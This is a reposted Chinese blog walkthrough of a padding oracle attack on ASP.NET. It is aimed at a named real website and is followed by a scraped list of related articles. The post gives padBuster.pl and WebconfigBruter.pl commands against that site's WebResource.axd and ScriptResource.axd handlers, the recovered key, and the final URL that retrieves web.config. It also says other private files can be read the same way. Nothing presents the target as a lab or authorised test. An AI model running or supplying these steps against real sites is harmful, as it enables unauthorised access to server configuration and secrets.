【原创】实战padding oracle漏洞
首先关于padding oracle漏洞的原理请看:
步入正传~~
搭建漏洞利用环境Perl
环境下载地址:链接:http://pan.baidu.com/s/1skFxVm1 密码:anuw
首先查看我们目标网站
http://www.hnmatc.org/admin/
然后我们查看页面的源代码
我们翻到如下链接
<script src="/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2&t=635844789308448806" type="text/javascript"></script><script src="/WebResource.axd?d=EmAjXDcDoy8nFp_k_mvjI05whiqnlUaw-CI-p9EFNRQ1&t=635844789308448806" type="text/javascript"></script>
我们选中复制 构建链接
http://www.hnmatc.org/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2
然后我们拿出我们的神器padBuster.pl
输入代码
padbuster.pl http://www.hnmatc.org/WebResource.axd?d=cWxcb2PXfUgWzoITVCYtLg2 cWxcb2PXfUgWzoITVCYtLg2 16 -encoding 3 -plaintext "|||~/web.config"
稍微等待几分钟。。。
在这里The ID# marked with ** is recommended :我们输入2
跑完之后可以看到密匙 然后再祭出我们的另外一个神器WebconfigBruter.pl
C:\>WebconfigBruter.pl http://www.hnmatc.org/ScriptResource.axd BEKLiGJw9rbsDY8IOiMmTAAAAAAAAAAAAAAAAAAAAAA1 16
然后继续跑
最后得到源密匙
最终得到密匙为:uuf1L6g9U_hn2M9xKLGxBgRCi4hicPa27A2PCDojJkwAAAAAAAAAAAAAAAAAAAAA0
然后访问地址:http://www.hnmatc.org/ScriptResource.axd?d=uuf1L6g9U_hn2M9xKLGxBgRCi4hicPa27A2PCDojJkwAAAAAAAAAAAAAAAAAAAAA0
最后 此漏洞不仅仅是可以读取到config文件 大量隐私文件都可以读取
转载于:https://www.cnblogs.com/wh4am1/p/6683393.html
【原创】实战padding oracle漏洞相关推荐
- 第5篇 | Shiro Padding Oracle无key的艰难实战利用过程
Part1 前言 大家好,上期分享了银行站的一个Java 的SSRF组合洞案例,这期讲讲分享一个Shiro Padding Oracle漏洞利用过程. Shiro反序列化漏洞自16年公布以来,至 ...
- 详解ASP.NET的最新安全漏洞,Padding Oracle攻击原理及其他
微软在9月17日中午正式对外公布了ASP.NET平台下的安全漏洞,即Microsoft Security Advisory (2416728). SecurityFocus上已将此漏洞定义成了&quo ...
- Apache Shiro Padding Oracle Attack (Shiro-721)漏洞复现
Apache Shiro Padding Oracle Attack (Shiro-721)漏洞复现 环境搭建 安装git 使用dockerfile 启动docker 获取dockerfile 查看是 ...
- shiro 721 反序列化漏洞复现与原理以及Padding Oracle Attack攻击加解密原理
文章目录 1. 前置知识 1.1 shiro550利用条件 原理 1.2 shiro721利用条件 原理 shiro-721对cookie中rememberMe的值的解析过程 1.3 基于返回包的sh ...
- Padding Oracle Attack填充提示攻击-渗透测试
漏洞简介 最近学习了一个shiro的 Critica级漏洞的验证,利用Padding Oracle Vulnerability破解rememberMe Cookie,达到反序列化漏洞的利用,攻击者无需 ...
- padding oracle attack相关之padding oracle attack
前段时间遇到一个挺有意思的题目,用到了padding oracle attack的相关知识,于是恶补了一下padding oracle attack相关内容,本着取之于民用之于民同时也可以方便自己以后 ...
- 记录我对Padding Oracle攻击的分析和思考之抄写
一.相关阅读资料 https://github.com/GDSSecurity/PadBuster PadBuster – Automated script for performing Paddin ...
- python从oracle提取数据库_Python编程实战之Oracle数据库操作示例
本文实例讲述了Python编程实战之Oracle数据库操作.分享给大家供大家参考,具体如下: 1. 要想使Python可以操作Oracle数据库,首先需要安装cx_Oracle包,可以通过下面的地址来 ...
- oracle10漏洞补丁下载,Oracle漏洞修复工具
Oracle漏洞修复工具是一款专业的Oracle数据库修复扫描工具,当Oracle数据库无法打开的时候,我们可以使用该神器直接读取数据文件然后对其进行解析恢复,软件支持修复因各种原因造成的数据库无法打 ...
- 一文读懂安全攻防实战、CNVD漏洞平台
安全的本质是攻防实战.无论是安全研发,还是安全服务,实战才是硬道理.网络安全的学习过程,就是不断在实战演练中积累实操经验的过程. 除了通过开源安全项目学习外,通过在CNVD漏洞平台尝试挖洞是一条高效的 ...
最新文章
- python创建只包含一个元素的元组时_Python 创建包含列表的元组
- GCC编译过程以及对应FILE文件表
- linux上安装activeMQ
- 学习ccna,ccnp中如何提高英语问题
- 让32位Eclipse和64位Eclipse同是在64的Windows7上运行
- pythonchar中的拟合方法_在python中利用numpy求解多项式以及多项式拟合的方法
- 需要多快的速度,才能在抽走桌布之后保持桌面物体不掉?
- php 实现类,php如何实现类
- c语言输出每个数占10列宽,杭州师范大学C语言试题第1套介绍.doc
- HBase编程 API入门系列之HTable pool(6)
- MyBatis快速将MySQL转换成Oracle语句
- Linux之fgrep命令
- 关闭迅雷“XLServicePlatform”服务 防止导致Win8假死
- 7.微服务设计 --- 测试
- 各个浏览器url带参限制
- 第二人生的源码分析(11)地面显示的实现
- SnakeGame(贪吃蛇游戏)
- Mock.js + RAP 使用介绍
- 微信小程序连接emqx服务器实现数据交互
- 虾皮物流怎么收费?收费标准是什么?
热门文章
- 有名内部类和匿名内部类的用法
- vue element 调用后台下载文件
- php 数据访问框架,PHP Ice框架数据库访问层- Ice Framework(PHP Web开发框架)
- java单链表上的选择排序_《Java数据结构和算法》简单排序选择排序
- python判断数字和字母切换_Python判断字符串是否为字母或者数字(浮点数)的多种方法...
- jquery mysql php_PHP+jQuery+MySQL来实现一个在线测试项目
- 针式打印机打印发虚_针式打印机使用技巧
- PTA甲级15进制转换
- ES(Elasticsearch)更改字段索引
- TestLink 测试/测试用例使用